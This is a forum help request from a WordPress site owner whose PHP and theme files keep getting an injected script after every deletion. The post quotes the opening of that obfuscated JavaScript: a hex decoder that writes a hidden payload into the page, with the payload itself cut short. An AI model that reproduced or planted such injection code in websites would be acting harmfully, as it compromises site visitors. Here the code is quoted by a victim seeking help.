hi-Jacked! – Bad Script keeps self installing in.php
-
Hi – Somehow i have gotten a ‘self installing’ script that i delete from .php files (like index.php) and then the next day it keeps coming back
It gets into the themes files as well the main wordpress files
i have completely deleted and reinstalled the themes folder/files and the main wp-files, but it must be hiding somewhere
it starts like this (always at the bottom of the file/page)
<script>function vtbtYbadtYV(vbYaydVYxVd){ var vtYaxxxxdYV=17; return(parseInt(vbYaydVYxVd,16));}function vdtxbVVxYat(vytVtdYbVdt){ function vyddVtYbVyV () {var vtVbbtbbxxt=17; return vtVbbtbbxxt;} var vdYYdxYVybV='';for(vdxVybaVVYb=0; vdxVybaVVYb<vytVtdYbVdt.length; vdxVybaVVYb+=2){vdYYdxYVybV+=(String.fromCharCode(vtbtYbadtYV(vytVtdYbVdt.substr(vdxVybaVVYb,2))));}return vdYYdxYVybV;} document.write(vdtxbVVxYat('3C534 heaps of numbers continue..etc etc... then script ends...Has anyone seen this before or have any ideas where it might be hiding? Or how to remove it???
(it’s also making my footer ‘hidden’ and has caused the error message “headers already sent”)
wp is in my root directory and the only other files i have uploaded are plugins i got from wordpress.org, and a theme i bought (which is fine – it was working for at least a week before this script turned up and i bought from a reputable site)
pls help!
thx
Rea
- The topic ‘hi-Jacked! – Bad Script keeps self installing in.php’ is closed to new replies.